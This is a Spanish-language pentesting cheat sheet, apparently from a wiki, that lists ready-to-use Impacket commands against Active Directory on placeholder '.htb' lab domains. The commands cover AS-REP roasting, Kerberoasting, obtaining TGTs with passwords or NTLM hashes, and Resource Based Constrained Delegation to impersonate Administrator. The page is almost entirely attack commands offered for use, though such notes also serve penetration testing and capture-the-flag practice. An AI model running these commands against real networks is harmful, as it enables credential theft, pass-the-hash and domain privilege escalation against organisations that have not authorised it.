Impacket
AS-REP Roast (GetNPUsers)
# AS-REP Roasting a través de un listado de usuarios en 'users.txt'
impacket-GetNPUsers -no-pass -usersfile users.txt dominio.htb/ 2>/dev/null
# AS-REP Roasting para un usuario en concreto
impacket-GetNPUsers dominio.htb/usuer -no-pass 2>/dev/null
Kerberoasting Attack (GetUserSPNs)
# Kerberoasting Attack con credenciales válidas y autenticación NTLM
impacket-GetUserSPNs -dc-ip 10.10.10.10 dominio.htb/user -request 2>/dev/null
impacket-GetUserSPNs -dc-ip 10.10.10.10 dominio.htb/user:'password' -request 2>/dev/null
# Kerberoasting Attack a través de autenticación Kerberos
impacket-GetUserSPNs -dc-ip 10.10.10.10 -dc-host dc.dominio.htb dominio.htb/user -k -no-pass -request 2>/dev/null
# Kerberoasting sin credenciales de dominio pero con un usuario AS-REP Roast, necesario disponer de lista de usuarios en 'users.txt'
impacket-GetUserSPNs -no-preauth 'usuario-asrep' -request -usersfile users.txt dominio.htb/ -dc-ip 10.10.10.161 2>/dev/null
Obtaining Ticket Granting Ticket [TGT] (getTGT)
# Obtención de TGT a través de contraseña básica
impacket-getTGT dominio.htb/user:'password' -dc-ip 10.10.10.10
# Obtención de TGT a través de Hash NTLM
impacket-getTGT dominio.htb/user -hashes :<NTLM_HASH> -dc-ip 10.10.10.10
# Obtención de TGT a través de Autenticación Kerberos
impacket-getTGT dominio.htb/user -k -no-pass -dc-ip 10.10.10.10
Resource Based Constrained Delegation [RBCD] (getST)
# RBCD a través de autenticación NTLM
impacket-getST -spn 'cifs/DC.dominio.htb' -impersonate Administrator -dc-ip 10.10.10.10 'dominio.htb'/'target_rbcd':'password' 2>/dev/null
# RBCD a través de PassTheHash
impacket-getST -spn 'cifs/DC.dominio.htb' -impersonate Administrator -dc-ip 10.10.10.10 'dominio.htb'/'target_rbcd' -hashes :<NTLM_HASH> 2>/dev/null
# RBCD a través de Autenticación Kerberos
impacket-getST -spn 'cifs/DC.dominio.htb' -impersonate Administrator -dc-ip 10.10.10.10 'dominio.htb'/'target_rbcd' -k -no-pass 2>/dev/null
Última actualización
¿Te fue útil?